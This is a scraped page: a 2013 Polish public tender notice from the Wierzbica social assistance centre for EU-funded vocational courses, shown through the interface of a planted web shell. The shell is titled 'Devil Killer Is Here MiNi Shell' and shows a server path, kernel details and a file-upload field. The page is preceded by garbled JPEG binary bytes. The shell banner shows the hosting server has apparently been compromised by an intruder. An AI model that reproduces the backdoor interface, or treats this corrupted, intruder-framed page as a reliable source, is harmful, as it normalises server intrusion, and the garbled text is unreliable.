JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130905/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130905/178419-N-2013.html

<p class="kh_header"><b>Wierzbica: Przeprowadzenie szkoleń zawodowych w związku z realizacją projektu systemowego AKTYWNOŚĆ -TWOJA PRZYSZŁOŚĆ współfinansowanego przez Unię Europejską przy udziale środków z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII - Promocja integracji społecznej, Działania 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałania 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej</b><br>
<b>Numer ogłoszenia: 178419 - 2013; data zamieszczenia: 05.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Krasickiego 27, 26-680 Wierzbica, woj. mazowieckie, tel. 48 618 24 21, faks 48 618 24 56.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gopswierzbica.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń zawodowych w związku z realizacją projektu systemowego AKTYWNOŚĆ -TWOJA PRZYSZŁOŚĆ współfinansowanego przez Unię Europejską przy udziale środków z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII - Promocja integracji społecznej, Działania 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałania 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia w odniesieniu do poszczególnych kursów:
1. Opieka nad osobami starszymi, chorymi i niepełnosprawnymi z kursem pierwszej pomocy
Liczba uczestników - 3
Minimalna ilość godzin - 120, 
Cel szkolenia: przygotowanie praktyczne i teoretyczne do wykonywania zawodu opiekuna osób starszych, chorych i niepełnosprawnych.  
Minimalny zakres programowy szkolenia:
-	wybrane zagadnienia z nauk społecznych, 
-	edukacja zdrowotna i opieka, 
-	pierwsza pomoc w nagłych wypadkach i zachorowaniach,
-	zasady udzielania pierwszej pomocy,
-	przygotowanie do udzielenia pierwszej pomocy przedlekarskiej,
-	metody terapii i aktywizacji, 
-	podstawy anatomii i fizjologii człowieka, 
-	zdobycie wiedzy i umiejętności z zakresu sprawowania opieki nad osobami starszymi,      
-	pielęgnacja osoby starszej, 
-	wykonywanie zabiegów pielęgnacyjno - higienicznych (m.in. pielęgnacja ran przewlekłych, pielęgnacja osoby chorej)
-	higiena żywienia 
-	rozwiązywanie problemów zdrowotnych (wieku geriatrycznego),
-	umiejętność prawidłowej opieki (np. nad chorym z chorobą nowotworową,osoba dorosła) i zagospodarowania wolnego czasu,
-	współpraca z podopiecznym i jego rodziną,
-	przepisy dotyczące bezpieczeństwa i higieny pracy podczas opieki nad osobą starszą            i niepełnosprawną,

2 . Kucharz małej gastronomii 
Liczba uczestników - 3
Minimalna ilość godzin - 100, 
Cel szkolenia: przygotowanie praktyczne i teoretyczne do wykonywania zawodu kucharza małej gastronomii. 
Minimalny zakres programowy szkolenia:
-	podstawy prawne: przepisy sanitarno - epidemiologiczne, prawo pracy, przepisy BHP i P.POŻ., przepisy unijne w gastronomii, procedury Analizy Ryzyka i Krytycznych Punktów Kontroli (HACCP) i procedury Dobrej Praktyki Kateringowej (GCP),
-	organizacja pracy zgodnie z zasadami i przepisami BHP, bezpieczeństwa żywności, ergonomii, ochrony przeciwpożarowej i ochrony środowiska,
-	omówienie zagadnień dotyczących minimum sanitarnego,
-	dobierania, obsługiwania maszyn, urządzeń i sprzętu w małej gastronomii,
-	towaroznawstwo w gastronomii,
-	technologia żywienia,
-	sztuka dekorowania potraw,
-	profesjonalny catering,
-	zasady żywienia,
-	planowanie posiłków i układanie prostego menu w małej gastronomii,
-	sporządzanie różnymi technikami i metodami podstawowego asortymentu potraw                 i napojów w małej gastronomii - zajęcia praktyczne,
-	zasady układania menu zgodnego z zasadami zdrowego żywienia.

3 . Profesjonalny sprzedawca -handlowiec z obsługą kas fiskalnych, komputera                       i terminala płatniczego 
Liczba uczestników - 4
Minimalna ilość godzin - 120, 
Cel szkolenia: zdobycie niezbędnej wiedzy teoretycznej i praktycznych umiejętności                    w zakresie prowadzenia sprzedaży przy użyciu kas fiskalnych i urządzeń komputerowych               z uwzględnieniem popularnych programów komputerowych wykorzystywanych w handlu oraz rozliczania utargów w placówkach handlowych.
Minimalny zakres programowy szkolenia:
-	przepisy prawne związane z zawodem sprzedawcy, 
-	elementy towaroznawstwa handlowego,
-	dokumentacja handlowa i magazynowa, 
-	zajęcia praktyczne - obsługa kas fiskalnych,
-	komputerowy program do fakturowania CDN FPP, 
-	użytkowanie komputerów,
-	MS Word- przetwarzanie tekstów, 
-	MS Excel- arkusze kalkulacyjne, 
-	MS PowerPoint- grafika menedżerska i prezentacyjna, 
-	MS Access- bazy danych, 
-	przeglądanie stron internetowych i komunikacja, 
-	zawieranie transakcji sprzedaży, inkasowanie za pomocą kasy fiskalnej należności od klientów w wysokości wyszczególnionej w dowodach sprzedaży, przyjmowanie należności od klientów w formie gotówki, wydawanie reszty,
-	przyjmowanie należności od klientów w formie czeku, karty kredytowej, bonu towarowego,
-	potwierdzanie za pomocą kasy rejestracyjnej przyjęcia należności, czuwanie nad prawidłowym rejestrowaniem przyjętej należności na właściwych licznikach kasy,
-	sporządzanie faktur za towary na blankietach jak również przy użyciu urządzeń komputerowych. Załatwianie reklamacji zakupionych towarów,
-	sprawdzanie towarów pod względem ilościowym i jakościowym, uiszczanie należności za dostarczone produkty. Przygotowywanie produktów do sprzedaży (czyszczenie, sortowanie itp.) i ich wyeksponowanie. Informowanie nabywcy                             o walorach sprzedawanych produktów, pomoc nabywcy przy wyborze produktu,
-	informowanie o warunkach sprzedaży (stosowane upusty). Współpraca                                 w przygotowaniu oferty sprzedaży z wykorzystaniem komputera (oferty towarowe, cenniki, katalogi itp.).

4. Kosmetyka z elementami wizażu i stylizacją paznokci
Liczba uczestników - 1
Minimalna ilość godzin - 120, 
Cel szkolenia: przygotowanie w części teoretycznej i praktycznej do wykonywania zawodu kosmetyczki, z wykorzystaniem praktycznych umiejętności z zakresu wizażu oraz umiejętność przedłużania i zdobienia paznokci metodą żelową.
Minimalny zakres programowy szkolenia:
-	zapoznanie z wyposażeniem oraz organizacja pracy kosmetyczki,
-	przepisy BHP, dezynfekcja i sterylizacja narzędzi,
-	pielęgnacja dłoni i stóp (manicure i pedicure),
-	przedłużanie paznokci metodą żelową i jego zdobienie,
-	pielęgnacja twarzy: oczyszczanie twarzy, henna, regulacja brwi, zabiegi na twar,
-	pielęgnacja ciała,
-	masaż kosmetyczny, zabiegi relaksacyjne,
-	depilacja ciała,
-	makijaż dzienny, ślubny, wieczorowy, korekta twarzy przez makijaż,
-	analiza kolorystyczna.

5. Ogrodnik terenów zielonych  z elementami florystyki 
Liczba uczestników -1
Minimalna ilość godzin - 120, 
Cel szkolenia: przygotowanie praktyczne i teoretyczne do wykonywania zawodu ogrodnika terenów zielonych z elementami florystyki.
Minimalny zakres programowy szkolenia:
-	wykonywanie czynności pielęgnacyjnych przy materiale roślinnym: odchwaszczanie, nawożenie, obcinanie przekwitłych kwiatostanów, koszenie trawników; praca                     z urządzeniami ogrodniczymi,
-	praca z wykresami, rysunkami, planami zagospodarowania przestrzennego,
-	praca na maszynach usprawniających prace ogrodnicze,
-	zapoznanie się z rodzajami roślin,
-	nauka handlu roślinami ogrodniczymi,
-	nauka o nawozach i płynach,
-	nauka aranżacji roślin wewnętrznych,
-	organizacja pracy gospodarstw kwiaciarskich,
-	zapoznanie z uprawą, sadzeniem roślin pnących,
-	sadzenie drzew i krzewów,
-	projektowanie ogrodów,
-	przygotowanie gleby w gruncie i pielęgnacja roślin w inspektach, szklarniach do siewu i sadzenia,
-	wykonywanie prac pomocniczych przy wyznaczania ukształtowania terenu oraz prowadzenie robót ziemnych związanych z modelowaniem terenu wg uprzednio wyznaczonych poziomów i spadków,
-	karczowanie i ścinanie drzew przy użyciu specjalnych maszyn i pił mechanicznych oraz przeprowadzanie cięć sanitarnych drzew i krzewów liściastych w parkach, zieleńcach i na ulicach,
-	nauka właściwego dobierania kwiatów do danego bukietu kompozycji kwiatowych wg najnowszych zasad i technik bukieciarskich na różne okazje: ślub, pogrzeby, wykonywania drobnych dekoracji kwiatowych,stroików.

6. Magazynier z obsługą komputera, kasy fiskalnej i wózka widłowego
liczba uczestników - 1
Minimalna ilość godzin - 120, 
Cel szkolenia: przygotowanie praktyczne i teoretyczne do wykonywania zawodu magazyniera.
Minimalny zakres programowy szkolenia:
-	typy stosowanych wózków jezdniowych,
-	budowa wózków, 
-	czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy wózkami,
-	czynności operatora w czasie pracy wózkami, 
-	wiadomości z zakresu ładunkoznawstwa,
-	wiadomości z zakresu BHP,
-	przepisy dotyczące dozoru technicznego,
-	praktyczna nauka jazdy,
-	gospodarka magazynowania,
-	towaroznawstwo,
-	przepisy bhp i ppoż.,
-	obsługa i wymiana butli w wózkach napędzanych gazem, 
-	podstawy obsługi komputera - Excel, Word, Windows XP, internet,
-	zastosowanie komputera w gospodarce magazynowej,
-	zastosowanie komputera w programach finansowo - księgowych, 
-	praktyczna nauka jazdy i manewrowanie osprzętem wózków, 
-	obsługa kas fiskalnych

7. Kurs komputerowy-  tworzenie stron internetowych, grafika komputerowa
liczba uczestników -1
Minimalna ilość godzin - 120, 
Cel szkolenia: nabycie wiedzy z zakresu obsługi komputera z umiejętnością tworzenia stron www               i grafiki komputerowej.
Minimalny zakres programowy szkolenia:
-	Wiadomości ogólne - uruchamianie komputera
-	System WINDOWS
-	Edytor tekstu WORD
-	Arkusz kalkulacyjny EXCEL
-	Internet, wirusy komputerowe i poczta e-mail
-	Tworzenie stron www 
-	Grafika komputerowa i Power Point

8. Kurs komputerowy( podstawy: system Windows, Office , Excel, Internet)
Liczba uczestników -16
Minimalna ilość godzin - 40, 
Cel szkolenia: nabycie i opanowanie wiedzy i umiejętności z zakresu obsługi komputera.
Minimalny zakres programowy szkolenia:
-	wiadomości ogólne- uruchomienie komputera,
-	system Windows,
-	praca z edytorem tekstu WOR,
-	arkusz kalkulacyjny Excel,
-	obsługa internetu, wirusy komputerowe i poczta e- mail,

9. Wizaż i stylizacja
Liczba uczestników -16
Minimalna ilość godzin - 40, 
Cel szkolenia: zdobycie wszechstronnej wiedzy z zakresu praktycznych porad dotyczących wykonywania makijażu, rozpoznawania defektów kosmetycznych skóry twarzy , tuszowania wad sylwetki poprzez dobór stroju, itp.
Minimalny zakres programowy szkolenia:
-	charakterystyka rodzajów skóry,
-	łatwy makijaż: efektowna zmiana,
-	pielęgnacja twarzy- podstawa udanego makijażu, 
-	dobór makijażu do typu urody, 
-	przybory makijażysty i ich zastosowanie, 
-	kosmetyki do makijażu,
-	makijaż dzienny i wieczorowy.

10. Prawo jazdy kat. B
Liczba uczestników - 3
Minimalna ilość godzin - 60 (30h=45 min.. zajęć teoretycznych i 30 h=60 min.. zajęć praktycznych).
Cel szkolenia: zdobycie wiedzy z zakresu znajomości przepisów prawa ruchu drogowego, umiejętności jazdy samochodem osobowym oraz przygotowanie do egzaminu kwalifikacyjnego w Wojewódzkim Ośrodku Ruchu Drogowego.
1.  Szkolenia powinny być przeprowadzone przez wykwalifikowaną kadrę.
2. Szkolenie należy przeprowadzić zgodnie z obowiązującymi w tym zakresie przepisami prawa, a w szczególności ustawą o kierujących pojazdami ( Dz.U. z 2011r. Nr 30 poz. 151 ze zm.) oraz Rozporządzeniem Ministra Transportu Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców. Na Wykonawcy będzie spoczywał obowiązek uregulowania wszystkich spraw związanych z egzaminem państwowym teoretycznym                      i praktycznym w Wojewódzkim Ośrodku Ruchu Drogowego w Radomiu dla osób, które zdały egzamin wewnętrzny. Wykonawca najpierw opłaci i skieruje osobę na egzamin państwowy              z części teoretycznej, a następnie, po uzyskaniu pozytywnego wyniku z tej części opłaci                      i skieruje osobę na egzamin państwowy z części praktycznej. W przypadku uzyskania negatywnego wyniku  z części teoretycznej egzaminu państwowego, kursantowi nie przysługuje prawo do skierowania i sfinansowania części praktycznej egzaminu państwowego. Skierowanie osoby na egzamin może się odbyć jednokrotnie.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.45.40.00-7, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają wpis do rejestru przedsiębiorców prowadzących ośrodki szkolenia kierowców w zakresie prawa jazdy kategorii B i C, zgodnie z ustawą z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz. U z 2005r. Nr 108, poz. 908 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w ciągu ostatnich 3 lat, przed upływem terminu składnia ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zorganizowali co najmniej 2 kursy zawodowe pn. prawo jazdy kat. B lub dwa kursy Kosmetyczka z wizażem i stylizacją  paznokci lub dwa kursy komputerowe, lub dwa kursy Opiekunka na osobami starszymi, chorymi   i niepełnosprawnymi z kursem pierwszej pomocy, lub dwa kursy Kucharz małej gastronomii lub dwa kursy Profesjonalny sprzedawca - handlowiec z obsługą kasy fiskalnej, komputera i terminala płatniczego lub dwa kursy Ogrodnik terenów zielonych z elementami florystyki lub dwa kursy   Magazynier z obsługą komputera, kasy fiskalnej i wózka widłowego, lub dwa kursy Obsługa komputera -tworzenie stron www i grafika komputerowa. Wykonawca winien załączyć dokumenty potwierdzające, że te usługi zostały wykonane należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy W ciągu ostatnich 3 lat, przed upływem terminu składnia ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zorganizowali co najmniej 2 kursy zawodowe pn. prawo jazdy kat. B lub dwa kursy Kosmetyczka z wizażem i stylizacją  paznokci lub dwa kursy komputerowe, lub dwa kursy Opiekunka na osobami starszymi, chorymi                         i niepełnosprawnymi z kursem pierwszej pomocy, lub dwa kursy Kucharz małej gastronomii lub dwa kursy Profesjonalny sprzedawca - handlowiec z obsługą kasy fiskalnej, komputera            i terminala płatniczego lub dwa kursy Ogrodnik terenów zielonych z elementami florystyki lub dwa kursy   Magazynier z obsługą komputera, kasy fiskalnej i wózka widłowego, lub dwa kursy Obsługa komputera -tworzenie stron www i grafika komputerowa. Wykonawca winien załączyć dokumenty potwierdzające, że te usługi zostały wykonane należycie.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Oferta na wykonanie zamówienia publicznego (Zał. nr 1 do SIWZ)
2. Dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
3. Przed podpisaniem umowy należy dostarczyć:
Oświadczenie dot.  zatrudnienia w instytucjach uczestniczących w realizacji POKL i innych projektach finansowanych w ramach POKL lub w ramach inn6ych programów NSRO (załącznik nr 7)
Oświadczenie o braku powiązań z Zamawiającym (załącznik nr 8).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza zmianę umowy w formie aneksu, jeżeli zajdzie potrzeba                w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. Zmiana wymaga zgłoszenia                 w formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta może spowodować wydłużenie terminu wykonania prac i nie spowoduje zmiany wynagrodzenia wykonawcy Inicjatorem tej zmiany może być Zamawiający lub Wykonawca.
2.	Zamawiający dopuszcza zmianę umowy w formie aneksu w sytuacji, kiedy nastąpi ustawowa zmiana stawki VAT. Inicjatorem tej zmiany może być Zamawiający lub Wykonawca. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta nie wpłynie na termin wykonania prac i spowoduje zmianę wynagrodzenia Wykonawcy brutto. Kwota netto wynagrodzenia pozostanie bez zmian. 
3.	Zamawiający dopuszcza zmianę umowy w formie aneksu w sytuacji zdarzeń losowych, które uniemożliwiają danemu uczestnikowi udział w kursie/szkoleniu. Inicjatorem tej zmiany może być Zamawiający. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 7 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta nie wpłynie na termin wykonania prac i spowoduje zmianę wynagrodzenia Wykonawcy brutto</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gopswierzbica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GMINNY OŚRODEK POMOCY SPOŁECZNEJ W WIERZBICY
26-680 WIERZBICA
ul. Krasickiego 27,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2013 godzina 08:30, miejsce: GMINNY OŚRODEK POMOCY SPOŁECZNEJ W WIERZBICY
26-680 WIERZBICA
ul. Krasickiego 27,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy AKTYWNOŚĆ -TWOJA PRZYSZŁOŚĆ współfinansowanego przez Unię Europejską przy udziale środków z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII - Promocja integracji społecznej, Działania 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałania 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej..</p>
